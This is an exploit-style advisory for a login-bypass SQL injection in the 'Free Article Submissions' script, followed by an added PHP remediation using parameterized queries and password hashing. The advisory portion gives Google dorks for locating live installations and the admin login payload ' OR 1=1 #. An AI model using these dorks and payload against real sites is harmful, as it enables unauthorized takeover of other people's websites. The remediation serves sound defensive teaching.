# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal" inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» The author will not be responsible for any damage. «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x   SQL Injection Bypass Login
x
x Risk level: High
x   ~ The remote attacker has the possibility to manage the website.
x   ~ The remote attacker is able to log in to the website with access level as admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username :' OR 1=1 #
## Password :barrabravaz
##
##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn
[+] Slackerc0de Family
[+] SBH Pentester
[+] Pocong XXX
[+] Madleets
[+] Xplorecrew
[+] Hackernewbie
[+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
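
Remediation sketch for the login bypass reported above. This is an added example, not the vendor's code and not part of the original advisory: it shows a parameterized admin login check that treats the reported username as plain data. The table admin_users, its columns, the function name verify_admin_login and the demo password are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code. Table/column names are hypothetical.
//
// Login code with this class of bug usually splices input into the SQL text:
//   "... WHERE username = '$user' AND password = '$pass'"
// With the username from the proof of concept, MySQL then sees
//   WHERE username = '' OR 1=1 #' AND password = '...'
// and ignores everything after '#', so the password test never runs.

function verify_admin_login(PDO $db, string $user, string $pass): ?int
{
    // The placeholder keeps the username as data; quotes and '#' inside it
    // cannot change the structure of the statement.
    $stmt = $db->prepare(
        'SELECT id, password_hash FROM admin_users WHERE username = :u LIMIT 1'
    );
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Check the password in application code against a stored hash,
    // never as a comparison inside the WHERE clause.
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Constructed demo data. In-memory SQLite stands in for the MySQL
// database so the script runs offline; the PDO calls are the same.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin_users (
    id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare(
    'INSERT INTO admin_users (username, password_hash) VALUES (?, ?)'
);
$ins->execute(['admin', password_hash('constructed-demo-password', PASSWORD_DEFAULT)]);

// The advisory's input is now looked up as a literal, nonexistent username.
var_dump(verify_admin_login($db, "' OR 1=1 #", 'barrabravaz'));
// A real account with its correct password still authenticates.
var_dump(verify_admin_login($db, 'admin', 'constructed-demo-password'));
```

Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared server-side rather than assembled by the driver.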